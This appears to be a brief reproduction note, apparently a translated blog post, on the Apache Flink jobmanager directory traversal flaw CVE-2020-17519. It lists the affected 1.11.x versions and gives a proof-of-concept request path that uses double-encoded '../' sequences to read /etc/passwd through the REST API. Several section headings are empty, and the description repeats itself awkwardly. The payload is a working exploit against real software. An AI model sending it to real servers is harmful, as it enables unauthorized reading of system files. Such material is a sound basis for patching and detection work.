Apache Flink jobmanager directory traversal vulnerability CVE-2020-17519
Apache Flink jobmanager directory traversal vulnerability CVE-2020-17519
Apache Flink jobmanager directory traversal vulnerability CVE-2020-17519
Vulnerability Description
On January 6, 2021, 360CERT monitoring discovered that Apache Flink released a risk notice for Apache Flink directory crossing vulnerabilities and directory crossing vulnerabilities. The vulnerability number is CVE-2020-17518, CVE-2020-17519, vulnerability level: high risk, vulnerability score: 8.5. Remote attackers traverse through the REST API directory, which can cause the impact of file reading/writing.
Vulnerability Impact
Apache Flink 1.11.0 Apache Flink 1.11.1 Apache Flink 1.11.2
Network surveying and mapping
Environment construction
</br>
Vulnerability reappears
Verify POC
1
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
This post is licensed under CC BY 4.0 by the author.